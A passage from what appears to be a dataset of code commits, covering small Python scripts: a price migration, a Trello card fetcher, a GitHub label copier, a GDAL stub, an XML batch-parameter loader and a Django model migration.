if isinstance(service.get('priceMax'), (int, float)):
change = True
service['priceMax'] = '{}'.format(service['priceMax'])
if change:
try:
client.update_service(service['id'], service, 'migration')
except apiclient.APIError as e:
print(e.message)
print(service)
pass
return do_update
def main(api_url, api_access_token):
client = apiclient.DataAPIClient(api_url, api_access_token)
pool = ThreadPool(10)
for i in pool.imap_unordered(update(client), enumerate(client.find_services_iter())):
pass
if __name__ == "__main__":
arguments = docopt(__doc__)
main(
api_url=arguments['<api_endpoint>'],
api_access_token=arguments['<api_access_token>'],
)
|
|
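The conversion leans on str.format's default rendering of numbers, which preserves the value verbatim without any currency formatting — consistent with the commit message's note that no nice formatting is attempted:

# '{}'.format renders numbers verbatim, so ints and floats round-trip cleanly:
assert '{}'.format(12) == '12'
assert '{}'.format(12.5) == '12.5'
assert '{}'.format(0.1) == '0.1'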
619533b0cc5426e2680626fdeb2f33a98b8fec89
|
scripts/trello-description.py
|
scripts/trello-description.py
|
import requests
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-k', '--key', dest='key',
help='trello api key', required=True)
parser.add_argument('-t', '--token', dest='token',
help='trello api token', required=True)
parser.add_argument('-b', '--board_id', dest='board_id',
help='trello board id', required=True)
parser.add_argument('-i', '--input_file', dest='input_file',
help='input file with trello ids', default='scripts/trello-numbers.txt')
parser.add_argument('-o', '--output_file', dest='output_file',
help='output file with trello description', default='scripts/trello-story-description.txt')
args = parser.parse_args()
short_ids = []
# Trello api endpoint for all cards for a given board
payload = {'key': args.key, 'token': args.token}
url = 'https://api.trello.com/1/boards/{board_id}/cards'.format(board_id=args.board_id)
# Store all trello short ids from file
with open(args.input_file, 'r') as trello_ids:
for trello_id in trello_ids:
short_ids.append(trello_id.strip())
# Fetch all cards from a trello board
cards = requests.request('GET', url, params=payload).json()
# Fetch trello description for a given list of trello ids
trello_cards_desc = [{'name': card['name'], 'trello_id': str(card['idShort'])} for card in cards if str(card['idShort']) in short_ids]
# Create output file with the trello description
with open(args.output_file, 'w') as output_file:
output_file.write('Trello Description: \n')
for trello_card_desc in trello_cards_desc:
output_file.write('{desc} (Trello ID: {id}) \n'.format(id=trello_card_desc['trello_id'],
desc=trello_card_desc['name']))
|
Create script to fetch trello name from a list of trello ids
|
Create script to fetch trello name from a list of trello ids
|
Python
|
mit
|
uktrade/data-hub-fe-beta2,uktrade/data-hub-fe-beta2,uktrade/data-hub-frontend,uktrade/data-hub-frontend,uktrade/data-hub-frontend
|
Create script to fetch trello name from a list of trello ids
|
import requests
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-k', '--key', dest='key',
help='trello api key', required=True)
parser.add_argument('-t', '--token', dest='token',
help='trello api token', required=True)
parser.add_argument('-b', '--board_id', dest='board_id',
help='trello board id', required=True)
parser.add_argument('-i', '--input_file', dest='input_file',
help='input file with trello ids', default='scripts/trello-numbers.txt')
parser.add_argument('-o', '--output_file', dest='output_file',
help='output file with trello description', default='scripts/trello-story-description.txt')
args = parser.parse_args()
short_ids = []
# Trello api endpoint for all cards for a given board
payload = {'key': args.key, 'token': args.token}
url = 'https://api.trello.com/1/boards/{board_id}/cards'.format(board_id=args.board_id)
# Store all trello short ids from file
with open(args.input_file, 'r') as trello_ids:
for trello_id in trello_ids:
short_ids.append(trello_id.strip())
# Fetch all cards from a trello board
cards = requests.request('GET', url, params=payload).json()
# Fetch trello description for a given list of trello ids
trello_cards_desc = [{'name': card['name'], 'trello_id': str(card['idShort'])} for card in cards if str(card['idShort']) in short_ids]
# Create output file with the trello description
with open(args.output_file, 'w') as output_file:
output_file.write('Trello Description: \n')
for trello_card_desc in trello_cards_desc:
output_file.write('{desc} (Trello ID: {id}) \n'.format(id=trello_card_desc['trello_id'],
desc=trello_card_desc['name']))
|
<commit_before><commit_msg>Create script to fetch trello name from a list of trello ids<commit_after>
|
import requests
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-k', '--key', dest='key',
help='trello api key', required=True)
parser.add_argument('-t', '--token', dest='token',
help='trello api token', required=True)
parser.add_argument('-b', '--board_id', dest='board_id',
help='trello board id', required=True)
parser.add_argument('-i', '--input_file', dest='input_file',
help='input file with trello ids', default='scripts/trello-numbers.txt')
parser.add_argument('-o', '--output_file', dest='output_file',
help='output file with trello description', default='scripts/trello-story-description.txt')
args = parser.parse_args()
short_ids = []
# Trello api endpoint for all cards for a given board
payload = {'key': args.key, 'token': args.token}
url = 'https://api.trello.com/1/boards/{board_id}/cards'.format(board_id=args.board_id)
# Store all trello short ids from file
with open(args.input_file, 'r') as trello_ids:
for trello_id in trello_ids:
short_ids.append(trello_id.strip())
# Fetch all cards from a trello board
cards = requests.request('GET', url, params=payload).json()
# Fetch trello description for a given list of trello ids
trello_cards_desc = [{'name': card['name'], 'trello_id': str(card['idShort'])} for card in cards if str(card['idShort']) in short_ids]
# Create output file with the trello description
with open(args.output_file, 'w') as output_file:
output_file.write('Trello Description: \n')
for trello_card_desc in trello_cards_desc:
output_file.write('{desc} (Trello ID: {id}) \n'.format(id=trello_card_desc['trello_id'],
desc=trello_card_desc['name']))
|
Create script to fetch trello name from a list of trello idsimport requests
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-k', '--key', dest='key',
help='trello api key', required=True)
parser.add_argument('-t', '--token', dest='token',
help='trello api token', required=True)
parser.add_argument('-b', '--board_id', dest='board_id',
help='trello board id', required=True)
parser.add_argument('-i', '--input_file', dest='input_file',
help='input file with trello ids', default='scripts/trello-numbers.txt')
parser.add_argument('-o', '--output_file', dest='output_file',
help='output file with trello description', default='scripts/trello-story-description.txt')
args = parser.parse_args()
short_ids = []
# Trello api endpoint for all cards for a given board
payload = {'key': args.key, 'token': args.token}
url = 'https://api.trello.com/1/boards/{board_id}/cards'.format(board_id=args.board_id)
# Store all trello short ids from file
with open(args.input_file, 'r') as trello_ids:
for trello_id in trello_ids:
short_ids.append(trello_id.strip())
# Fetch all cards from a trello board
cards = requests.request('GET', url, params=payload).json()
# Fetch trello description for a given list of trello ids
trello_cards_desc = [{'name': card['name'], 'trello_id': str(card['idShort'])} for card in cards if str(card['idShort']) in short_ids]
# Create output file with the trello description
with open(args.output_file, 'w') as output_file:
output_file.write('Trello Description: \n')
for trello_card_desc in trello_cards_desc:
output_file.write('{desc} (Trello ID: {id}) \n'.format(id=trello_card_desc['trello_id'],
desc=trello_card_desc['name']))
|
<commit_before><commit_msg>Create script to fetch trello name from a list of trello ids<commit_after>import requests
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument('-k', '--key', dest='key',
help='trello api key', required=True)
parser.add_argument('-t', '--token', dest='token',
help='trello api token', required=True)
parser.add_argument('-b', '--board_id', dest='board_id',
help='trello board id', required=True)
parser.add_argument('-i', '--input_file', dest='input_file',
help='input file with trello ids', default='scripts/trello-numbers.txt')
parser.add_argument('-o', '--output_file', dest='output_file',
help='output file with trello description', default='scripts/trello-story-description.txt')
args = parser.parse_args()
short_ids = []
# Trello api endpoint for all cards for a given board
payload = {'key': args.key, 'token': args.token}
url = 'https://api.trello.com/1/boards/{board_id}/cards'.format(board_id=args.board_id)
# Store all trello short ids from file
with open(args.input_file, 'r') as trello_ids:
for trello_id in trello_ids:
short_ids.append(trello_id.strip())
# Fetch all cards from a trello board
cards = requests.request('GET', url, params=payload).json()
# Fetch trello description for a given list of trello ids
trello_cards_desc = [{'name': card['name'], 'trello_id': str(card['idShort'])} for card in cards if str(card['idShort']) in short_ids]
# Create output file with the trello description
with open(args.output_file, 'w') as output_file:
output_file.write('Trello Description: \n')
for trello_card_desc in trello_cards_desc:
output_file.write('{desc} (Trello ID: {id}) \n'.format(id=trello_card_desc['trello_id'],
desc=trello_card_desc['name']))
|
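A quick usage sketch of the same card-fetch call, runnable on its own; the key, token, and board id below are placeholders, not values from the commit:

import requests

payload = {'key': 'YOUR_KEY', 'token': 'YOUR_TOKEN'}  # placeholder credentials
url = 'https://api.trello.com/1/boards/{}/cards'.format('YOUR_BOARD_ID')
cards = requests.get(url, params=payload).json()
# These short ids are what scripts/trello-numbers.txt is expected to contain.
print([card['idShort'] for card in cards])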
|
49e79f41542702dd2409d4a5fbbad28a2c88341b
|
copy_labels.py
|
copy_labels.py
|
#!/usr/bin/env python
"""Copy tags from one repo to others."""
from __future__ import print_function
import json
import requests
import yaml
from helpers import paginated_get
LABELS_URL = "https://api.github.com/repos/{owner_repo}/labels"
def get_labels(owner_repo):
url = LABELS_URL.format(owner_repo=owner_repo)
labels = paginated_get(url)
labels = list(labels)
for label in labels:
del label['url']
return labels
def set_labels(owner_repo, labels):
for label in labels:
url = LABELS_URL.format(owner_repo=owner_repo)
r = requests.post(url, data=json.dumps(label))
if r.status_code != 200:
print(r.status_code)
print(r.text)
def copy_labels(source_owner_repo):
labels = get_labels(source_owner_repo)
with open("repos.yaml") as repos_file:
REPO_INFO = yaml.load(repos_file)
for owner_repo in sorted(REPO_INFO):
if owner_repo == source_owner_repo:
continue
print("Copying labels into {}".format(owner_repo))
set_labels(owner_repo, labels)
if __name__ == "__main__":
copy_labels("edx/edx-platform")
|
Copy labels from edx-platform to all the other repos
|
Copy labels from edx-platform to all the other repos
|
Python
|
apache-2.0
|
edx/repo-tools,edx/repo-tools
|
Copy labels from edx-platform to all the other repos
|
#!/usr/bin/env python
"""Copy tags from one repo to others."""
from __future__ import print_function
import json
import requests
import yaml
from helpers import paginated_get
LABELS_URL = "https://api.github.com/repos/{owner_repo}/labels"
def get_labels(owner_repo):
url = LABELS_URL.format(owner_repo=owner_repo)
labels = paginated_get(url)
labels = list(labels)
for label in labels:
del label['url']
return labels
def set_labels(owner_repo, labels):
for label in labels:
url = LABELS_URL.format(owner_repo=owner_repo)
r = requests.post(url, data=json.dumps(label))
if r.status_code != 200:
print(r.status_code)
print(r.text)
def copy_labels(source_owner_repo):
labels = get_labels(source_owner_repo)
with open("repos.yaml") as repos_file:
REPO_INFO = yaml.load(repos_file)
for owner_repo in sorted(REPO_INFO):
if owner_repo == source_owner_repo:
continue
print("Copying labels into {}".format(owner_repo))
set_labels(owner_repo, labels)
if __name__ == "__main__":
copy_labels("edx/edx-platform")
|
<commit_before><commit_msg>Copy labels from edx-platform to all the other repos<commit_after>
|
#!/usr/bin/env python
"""Copy tags from one repo to others."""
from __future__ import print_function
import json
import requests
import yaml
from helpers import paginated_get
LABELS_URL = "https://api.github.com/repos/{owner_repo}/labels"
def get_labels(owner_repo):
url = LABELS_URL.format(owner_repo=owner_repo)
labels = paginated_get(url)
labels = list(labels)
for label in labels:
del label['url']
return labels
def set_labels(owner_repo, labels):
for label in labels:
url = LABELS_URL.format(owner_repo=owner_repo)
r = requests.post(url, data=json.dumps(label))
if r.status_code != 200:
print(r.status_code)
print(r.text)
def copy_labels(source_owner_repo):
labels = get_labels(source_owner_repo)
with open("repos.yaml") as repos_file:
REPO_INFO = yaml.load(repos_file)
for owner_repo in sorted(REPO_INFO):
if owner_repo == source_owner_repo:
continue
print("Copying labels into {}".format(owner_repo))
set_labels(owner_repo, labels)
if __name__ == "__main__":
copy_labels("edx/edx-platform")
|
Copy labels from edx-platform to all the other repos
#!/usr/bin/env python
"""Copy tags from one repo to others."""
from __future__ import print_function
import json
import requests
import yaml
from helpers import paginated_get
LABELS_URL = "https://api.github.com/repos/{owner_repo}/labels"
def get_labels(owner_repo):
url = LABELS_URL.format(owner_repo=owner_repo)
labels = paginated_get(url)
labels = list(labels)
for label in labels:
del label['url']
return labels
def set_labels(owner_repo, labels):
for label in labels:
url = LABELS_URL.format(owner_repo=owner_repo)
r = requests.post(url, data=json.dumps(label))
if r.status_code != 200:
print(r.status_code)
print(r.text)
def copy_labels(source_owner_repo):
labels = get_labels(source_owner_repo)
with open("repos.yaml") as repos_file:
REPO_INFO = yaml.load(repos_file)
for owner_repo in sorted(REPO_INFO):
if owner_repo == source_owner_repo:
continue
print("Copying labels into {}".format(owner_repo))
set_labels(owner_repo, labels)
if __name__ == "__main__":
copy_labels("edx/edx-platform")
|
<commit_before><commit_msg>Copy labels from edx-platform to all the other repos<commit_after>#!/usr/bin/env python
"""Copy tags from one repo to others."""
from __future__ import print_function
import json
import requests
import yaml
from helpers import paginated_get
LABELS_URL = "https://api.github.com/repos/{owner_repo}/labels"
def get_labels(owner_repo):
url = LABELS_URL.format(owner_repo=owner_repo)
labels = paginated_get(url)
labels = list(labels)
for label in labels:
del label['url']
return labels
def set_labels(owner_repo, labels):
for label in labels:
url = LABELS_URL.format(owner_repo=owner_repo)
r = requests.post(url, data=json.dumps(label))
if r.status_code != 200:
print(r.status_code)
print(r.text)
def copy_labels(source_owner_repo):
labels = get_labels(source_owner_repo)
with open("repos.yaml") as repos_file:
REPO_INFO = yaml.load(repos_file)
for owner_repo in sorted(REPO_INFO):
if owner_repo == source_owner_repo:
continue
print("Copying labels into {}".format(owner_repo))
set_labels(owner_repo, labels)
if __name__ == "__main__":
copy_labels("edx/edx-platform")
|
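One caveat about the script above: GitHub answers a successful label creation with 201 Created, so the != 200 check also logs successes, and unauthenticated POSTs are rejected regardless. A minimal sketch of a stricter, authenticated call (owner/repo and token are placeholders):

import json
import requests

url = 'https://api.github.com/repos/OWNER/REPO/labels'  # placeholder repo
headers = {'Authorization': 'token YOUR_TOKEN'}         # placeholder token
label = {'name': 'example-label', 'color': 'f29513'}
r = requests.post(url, headers=headers, data=json.dumps(label))
if r.status_code not in (200, 201):
    print(r.status_code, r.text)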
|
5859a9fe249025e9175bfc1cbd845adaa371d590
|
backend/generateGeotiff.py
|
backend/generateGeotiff.py
|
# TODO almost everything
src_ds = gdal.Open( src_filename )
dst_ds = driver.CreateCopy( dst_filename, src_ds, 0 )
# Once we're done, close properly the dataset
dst_ds = None
src_ds = None
|
Add script for generating Geotiff
|
Add script for generating Geotiff
|
Python
|
mit
|
lukefi/missamustikka,lukefi/missamustikka,lukefi/missamustikka
|
Add script for generating Geotiff
|
# TODO almost everything
src_ds = gdal.Open( src_filename )
dst_ds = driver.CreateCopy( dst_filename, src_ds, 0 )
# Once we're done, close properly the dataset
dst_ds = None
src_ds = None
|
<commit_before><commit_msg>Add script for generating Geotiff<commit_after>
|
# TODO almost everything
src_ds = gdal.Open( src_filename )
dst_ds = driver.CreateCopy( dst_filename, src_ds, 0 )
# Once we're done, close properly the dataset
dst_ds = None
src_ds = None
|
Add script for generating Geotiff
# TODO almost everything
src_ds = gdal.Open( src_filename )
dst_ds = driver.CreateCopy( dst_filename, src_ds, 0 )
# Once we're done, close properly the dataset
dst_ds = None
src_ds = None
|
<commit_before><commit_msg>Add script for generating Geotiff<commit_after>
# TODO almost everything
src_ds = gdal.Open( src_filename )
dst_ds = driver.CreateCopy( dst_filename, src_ds, 0 )
# Once we're done, close properly the dataset
dst_ds = None
src_ds = None
|
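Since the commit is explicitly a stub (gdal, driver, and both file names are undefined), here is a minimal sketch of a runnable version; the GTiff driver choice and the file names are assumptions, not part of the commit:

from osgeo import gdal

src_filename = 'input.tif'   # placeholder input path
dst_filename = 'output.tif'  # placeholder output path
driver = gdal.GetDriverByName('GTiff')
src_ds = gdal.Open(src_filename)
dst_ds = driver.CreateCopy(dst_filename, src_ds, 0)
# Once we're done, close the datasets properly
dst_ds = None
src_ds = None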
|
c5a027748275d9b9065fd89be60d6b97a27fd3ed
|
Simulation/InterpretBatchParamsXML.py
|
Simulation/InterpretBatchParamsXML.py
|
from xml.etree.ElementTree import ElementTree, parse
from itertools import product
from collections import OrderedDict
# TODO: Add a feature to map certain variables onto other; so that r_mitosis 1 2 and 3 are synced, for example
# TODO: add custom processing of certain variables, like r_grow
def params_dict_for_batch(batch_iteration, xml_path, param_scan_specs_path):
'''
Generate a parameter dictionary corresponding to our current batch run
:param batch_iteration: the batch run number: like run0, run1, etc.
:param xml_path: the file path to the XML that will be decomposed into our dictionary
:param param_scan_specs_path: the filepath to the ParameterScanSpecs.xml, which we will manipulate
to make CompuCell run batches properly
:return: a dictionary corresponding to our current batch run
'''
super_dict = OrderedDict()
batch_vars_dict = OrderedDict()
batch_id_to_param_name_table = OrderedDict()
xml_file = parse(xml_path)
xml_root = xml_file.getroot()
# Generate a unique ID for each parameter that changes between runs, and link its name to its id in a table
def assign_batch_id(_name):
new_batch_id = 'batch_id_{}'.format(len(batch_vars_dict))
batch_id_to_param_name_table[new_batch_id] = _name
return new_batch_id
# Parse the params_package file, adding normal parameters to 'super_dict' and batch parameters
# to a special 'batch_dict.' Each entry of the batch dictionary contains a list, wherein each element
# is a value that will be sweeped.
for parameter_element in xml_root.iter('param'):
if parameter_element.attrib['batch'].lower() == "false":
super_dict[parameter_element.attrib['varName']] = parameter_element.text
elif parameter_element.attrib['batch'].lower() == "true":
batch_id = assign_batch_id(parameter_element.attrib['varName'])
batch_vars_dict[batch_id] = []
for values_element in parameter_element.iter('BatchValue'):
batch_vars_dict[batch_id].append(values_element.text)
# Generate a tuple for all possible combinations of batch values
all_combinations_of_params = list(product(*[batch_vars_dict[key] for key in batch_vars_dict]))
# Update parameter scan specs, just in case
num_runs = len(all_combinations_of_params)
update_parameter_scan_specs(num_runs=num_runs, scan_spec_path=param_scan_specs_path)
# Add the proper combination of batch variables to the super_dict and return it.
combination_of_interest = all_combinations_of_params[batch_iteration]
for i, key in enumerate(batch_vars_dict):
super_dict[batch_id_to_param_name_table[key]] = combination_of_interest[i]
return super_dict
|
Add beta ability to load params from xml
|
Add beta ability to load params from xml
|
Python
|
mit
|
ram8647/tcseg,ram8647/tcseg,ram8647/tcseg
|
Add beta ability to load params from xml
|
from xml.etree.ElementTree import ElementTree, parse
from itertools import product
from collections import OrderedDict
# TODO: Add a feature to map certain variables onto other; so that r_mitosis 1 2 and 3 are synced, for example
# TODO: add custom processing of certain variables, like r_grow
def params_dict_for_batch(batch_iteration, xml_path, param_scan_specs_path):
'''
Generate a parameter dictionary corresponding to our current batch run
:param batch_iteration: the batch run number: like run0, run1, etc.
:param xml_path: the file path to the XML that will be decomposed into our dictionary
:param param_scan_specs_path: the filepath to the ParameterScanSpecs.xml, which we will manipulate
to make CompuCell run batches properly
:return: a dictionary corresponding to our current batch run
'''
super_dict = OrderedDict()
batch_vars_dict = OrderedDict()
batch_id_to_param_name_table = OrderedDict()
xml_file = parse(xml_path)
xml_root = xml_file.getroot()
# Generate a unique ID for each parameter that changes between runs, and link its name to its id in a table
def assign_batch_id(_name):
new_batch_id = 'batch_id_{}'.format(len(batch_vars_dict))
batch_id_to_param_name_table[new_batch_id] = _name
return new_batch_id
# Parse the params_package file, adding normal parameters to 'super_dict' and batch parameters
# to a special 'batch_dict.' Each entry of the batch dictionary contains a list, wherein each element
# is a value that will be sweeped.
for parameter_element in xml_root.iter('param'):
if parameter_element.attrib['batch'].lower() == "false":
super_dict[parameter_element.attrib['varName']] = parameter_element.text
elif parameter_element.attrib['batch'].lower() == "true":
batch_id = assign_batch_id(parameter_element.attrib['varName'])
batch_vars_dict[batch_id] = []
for values_element in parameter_element.iter('BatchValue'):
batch_vars_dict[batch_id].append(values_element.text)
# Generate a tuple for all possible combinations of batch values
all_combinations_of_params = list(product(*[batch_vars_dict[key] for key in batch_vars_dict]))
# Update parameter scan specs, just in case
num_runs = len(all_combinations_of_params)
update_parameter_scan_specs(num_runs=num_runs, scan_spec_path=param_scan_specs_path)
# Add the proper combination of batch variables to the super_dict and return it.
combination_of_interest = all_combinations_of_params[batch_iteration]
for i, key in enumerate(batch_vars_dict):
super_dict[batch_id_to_param_name_table[key]] = combination_of_interest[i]
return super_dict
|
<commit_before><commit_msg>Add beta ability to load params from xml<commit_after>
|
from xml.etree.ElementTree import ElementTree, parse
from itertools import product
from collections import OrderedDict
# TODO: Add a feature to map certain variables onto other; so that r_mitosis 1 2 and 3 are synced, for example
# TODO: add custom processing of certain variables, like r_grow
def params_dict_for_batch(batch_iteration, xml_path, param_scan_specs_path):
'''
Generate a parameter dictionary corresponding to our current batch run
:param batch_iteration: the batch run number: like run0, run1, etc.
:param xml_path: the file path to the XML that will be decomposed into our dictionary
:param param_scan_specs_path: the filepath to the ParameterScanSpecs.xml, which we will manipulate
to make CompuCell run batches properly
:return: a dictionary corresponding to our current batch run
'''
super_dict = OrderedDict()
batch_vars_dict = OrderedDict()
batch_id_to_param_name_table = OrderedDict()
xml_file = parse(xml_path)
xml_root = xml_file.getroot()
# Generate a unique ID for each parameter that changes between runs, and link its name to its id in a table
def assign_batch_id(_name):
new_batch_id = 'batch_id_{}'.format(len(batch_vars_dict))
batch_id_to_param_name_table[new_batch_id] = _name
return new_batch_id
# Parse the params_package file, adding normal parameters to 'super_dict' and batch parameters
# to a special 'batch_dict.' Each entry of the batch dictionary contains a list, wherein each element
# is a value that will be sweeped.
for parameter_element in xml_root.iter('param'):
if parameter_element.attrib['batch'].lower() == "false":
super_dict[parameter_element.attrib['varName']] = parameter_element.text
elif parameter_element.attrib['batch'].lower() == "true":
batch_id = assign_batch_id(parameter_element.attrib['varName'])
batch_vars_dict[batch_id] = []
for values_element in parameter_element.iter('BatchValue'):
batch_vars_dict[batch_id].append(values_element.text)
# Generate a tuple for all possible combinations of batch values
all_combinations_of_params = list(product(*[batch_vars_dict[key] for key in batch_vars_dict]))
# Update parameter scan specs, just in case
num_runs = len(all_combinations_of_params)
update_parameter_scan_specs(num_runs=num_runs, scan_spec_path=param_scan_specs_path)
# Add the proper combination of batch variables to the super_dict and return it.
combination_of_interest = all_combinations_of_params[batch_iteration]
for i, key in enumerate(batch_vars_dict):
super_dict[batch_id_to_param_name_table[key]] = combination_of_interest[i]
return super_dict
|
Add beta ability to load params from xml
from xml.etree.ElementTree import ElementTree, parse
from itertools import product
from collections import OrderedDict
# TODO: Add a feature to map certain variables onto other; so that r_mitosis 1 2 and 3 are synced, for example
# TODO: add custom processing of certain variables, like r_grow
def params_dict_for_batch(batch_iteration, xml_path, param_scan_specs_path):
'''
Generate a parameter dictionary corresponding to our current batch run
:param batch_iteration: the batch run number: like run0, run1, etc.
:param xml_path: the file path to the XML that will be decomposed into our dictionary
:param param_scan_specs_path: the filepath to the ParameterScanSpecs.xml, which we will manipulate
to make CompuCell run batches properly
:return: a dictionary corresponding to our current batch run
'''
super_dict = OrderedDict()
batch_vars_dict = OrderedDict()
batch_id_to_param_name_table = OrderedDict()
xml_file = parse(xml_path)
xml_root = xml_file.getroot()
# Generate a unique ID for each parameter that changes between runs, and link its name to its id in a table
def assign_batch_id(_name):
new_batch_id = 'batch_id_{}'.format(len(batch_vars_dict))
batch_id_to_param_name_table[new_batch_id] = _name
return new_batch_id
# Parse the params_package file, adding normal parameters to 'super_dict' and batch parameters
# to a special 'batch_dict.' Each entry of the batch dictionary contains a list, wherein each element
# is a value that will be sweeped.
for parameter_element in xml_root.iter('param'):
if parameter_element.attrib['batch'].lower() == "false":
super_dict[parameter_element.attrib['varName']] = parameter_element.text
elif parameter_element.attrib['batch'].lower() == "true":
batch_id = assign_batch_id(parameter_element.attrib['varName'])
batch_vars_dict[batch_id] = []
for values_element in parameter_element.iter('BatchValue'):
batch_vars_dict[batch_id].append(values_element.text)
# Generate a tuple for all possible combinations of batch values
all_combinations_of_params = list(product(*[batch_vars_dict[key] for key in batch_vars_dict]))
# Update parameter scan specs, just in case
num_runs = len(all_combinations_of_params)
update_parameter_scan_specs(num_runs=num_runs, scan_spec_path=param_scan_specs_path)
# Add the proper combination of batch variables to the super_dict and return it.
combination_of_interest = all_combinations_of_params[batch_iteration]
for i, key in enumerate(batch_vars_dict):
super_dict[batch_id_to_param_name_table[key]] = combination_of_interest[i]
return super_dict
|
<commit_before><commit_msg>Add beta ability to load params from xml<commit_after>from xml.etree.ElementTree import ElementTree, parse
from itertools import product
from collections import OrderedDict
# TODO: Add a feature to map certain variables onto other; so that r_mitosis 1 2 and 3 are synced, for example
# TODO: add custom processing of certain variables, like r_grow
def params_dict_for_batch(batch_iteration, xml_path, param_scan_specs_path):
'''
Generate a parameter dictionary corresponding to our current batch run
:param batch_iteration: the batch run number: like run0, run1, etc.
:param xml_path: the file path to the XML that will be decomposed into our dictionary
:param param_scan_specs_path: the filepath to the ParameterScanSpecs.xml, which we will manipulate
to make CompuCell run batches properly
:return: a dictionary corresponding to our current batch run
'''
super_dict = OrderedDict()
batch_vars_dict = OrderedDict()
batch_id_to_param_name_table = OrderedDict()
xml_file = parse(xml_path)
xml_root = xml_file.getroot()
# Generate a unique ID for each parameter that changes between runs, and link its name to its id in a table
def assign_batch_id(_name):
new_batch_id = 'batch_id_{}'.format(len(batch_vars_dict))
batch_id_to_param_name_table[new_batch_id] = _name
return new_batch_id
# Parse the params_package file, adding normal parameters to 'super_dict' and batch parameters
# to a special 'batch_dict.' Each entry of the batch dictionary contains a list, wherein each element
# is a value that will be sweeped.
for parameter_element in xml_root.iter('param'):
if parameter_element.attrib['batch'].lower() == "false":
super_dict[parameter_element.attrib['varName']] = parameter_element.text
elif parameter_element.attrib['batch'].lower() == "true":
batch_id = assign_batch_id(parameter_element.attrib['varName'])
batch_vars_dict[batch_id] = []
for values_element in parameter_element.iter('BatchValue'):
batch_vars_dict[batch_id].append(values_element.text)
# Generate a tuple for all possible combinations of batch values
all_combinations_of_params = list(product(*[batch_vars_dict[key] for key in batch_vars_dict]))
# Update parameter scan specs, just in case
num_runs = len(all_combinations_of_params)
update_parameter_scan_specs(num_runs=num_runs, scan_spec_path=param_scan_specs_path)
# Add the proper combination of batch variables to the super_dict and return it.
combination_of_interest = all_combinations_of_params[batch_iteration]
for i, key in enumerate(batch_vars_dict):
super_dict[batch_id_to_param_name_table[key]] = combination_of_interest[i]
return super_dict
|
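Note that the commit calls update_parameter_scan_specs() without defining or importing it; a stub along these lines (signature inferred from the call site) keeps the module importable until the real implementation lands:

def update_parameter_scan_specs(num_runs, scan_spec_path):
    # Placeholder: rewrite ParameterScanSpecs.xml so CompuCell runs num_runs batches.
    pass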
|
3caef811ab9f60988dd06bc2161f373b61bb9c8d
|
mangaki/mangaki/migrations/0013_auto_20150616_0919.py
|
mangaki/mangaki/migrations/0013_auto_20150616_0919.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('mangaki', '0012_auto_20150616_0832'),
]
operations = [
migrations.AddField(
model_name='anime',
name='anime_type',
field=models.TextField(max_length=42, default=''),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='author',
field=models.ForeignKey(default=1, to='mangaki.Artist', related_name='authored'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='editor',
field=models.ForeignKey(default=1, to='mangaki.Editor'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='genre',
field=models.ManyToManyField(to='mangaki.Genre'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='nb_episodes',
field=models.TextField(max_length=16, default='Inconnu'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='origin',
field=models.CharField(max_length=10, default='', choices=[('japon', 'Japon'), ('coree', 'Coree'), ('france', 'France'), ('chine', 'Chine'), ('usa', 'USA'), ('allemagne', 'Allemagne'), ('taiwan', 'Taiwan'), ('espagne', 'Espagne'), ('angleterre', 'Angleterre'), ('hong-kong', 'Hong Kong'), ('italie', 'Italie'), ('inconnue', 'Inconnue'), ('intl', 'International')]),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='studio',
field=models.ForeignKey(default=1, to='mangaki.Studio'),
preserve_default=True,
),
]
|
Add attributes to Anime migration
|
Add attributes to Anime migration
|
Python
|
agpl-3.0
|
RaitoBezarius/mangaki,Mako-kun/mangaki,Elarnon/mangaki,RaitoBezarius/mangaki,Elarnon/mangaki,Mako-kun/mangaki,Mako-kun/mangaki,Elarnon/mangaki,RaitoBezarius/mangaki
|
Add attributes to Anime migration
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('mangaki', '0012_auto_20150616_0832'),
]
operations = [
migrations.AddField(
model_name='anime',
name='anime_type',
field=models.TextField(max_length=42, default=''),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='author',
field=models.ForeignKey(default=1, to='mangaki.Artist', related_name='authored'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='editor',
field=models.ForeignKey(default=1, to='mangaki.Editor'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='genre',
field=models.ManyToManyField(to='mangaki.Genre'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='nb_episodes',
field=models.TextField(max_length=16, default='Inconnu'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='origin',
field=models.CharField(max_length=10, default='', choices=[('japon', 'Japon'), ('coree', 'Coree'), ('france', 'France'), ('chine', 'Chine'), ('usa', 'USA'), ('allemagne', 'Allemagne'), ('taiwan', 'Taiwan'), ('espagne', 'Espagne'), ('angleterre', 'Angleterre'), ('hong-kong', 'Hong Kong'), ('italie', 'Italie'), ('inconnue', 'Inconnue'), ('intl', 'International')]),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='studio',
field=models.ForeignKey(default=1, to='mangaki.Studio'),
preserve_default=True,
),
]
|
<commit_before><commit_msg>Add attributes to Anime migration<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('mangaki', '0012_auto_20150616_0832'),
]
operations = [
migrations.AddField(
model_name='anime',
name='anime_type',
field=models.TextField(max_length=42, default=''),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='author',
field=models.ForeignKey(default=1, to='mangaki.Artist', related_name='authored'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='editor',
field=models.ForeignKey(default=1, to='mangaki.Editor'),
preserve_default=True,
),
migrations.AddField(
model_name='anime',
name='genre',
